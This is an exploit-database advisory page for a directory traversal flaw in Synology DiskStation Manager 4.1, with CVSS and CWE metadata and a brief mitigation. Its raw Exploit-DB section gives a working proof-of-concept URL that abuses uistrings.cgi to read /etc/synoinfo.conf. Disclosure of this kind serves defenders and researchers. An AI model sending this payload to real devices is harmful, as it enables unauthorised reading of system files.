header-logo
Suggest Exploit
vendor:
DiskStation Manager
by:
Berk Dusunur
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: DiskStation Manager
Affected Version From: 4.1
Affected Version To: 4.1
Patch Exists: NO
Related CWE: N/A
CPE: a:synology:diskstation_manager:4.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Parrot OS
2018

Synology DiskStation Manager 4.1 – Directory Traversal

Synology DiskStation Manager 4.1 is vulnerable to a directory traversal attack which allows an attacker to read arbitrary files on the system. This can be exploited by sending a specially crafted HTTP request containing an absolute path to the vulnerable script uistrings.cgi. An attacker can read arbitrary files on the system such as /etc/synoinfo.conf.

Mitigation:

Ensure that user input is validated and sanitized before being used in file operations.
Source

Exploit-DB raw data:

# Exploit Title: Synology DiskStation Manager 4.1 - Directory Traversal
# Google Dork: N/A
# Date: 2018-07-21
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://www.synology.com
# Software Link: https://www.synology.com
# Version: v4.1
# Tested on: Parrot OS
# CVE : N/A

# PoC

http://target:8888/scripts/uistrings.cgi?lang=.////////////////////////////////////////////////////////////////////////////////////////../../../../../etc/synoinfo.conf

Navigation

Suggest Exploit

Services By CQR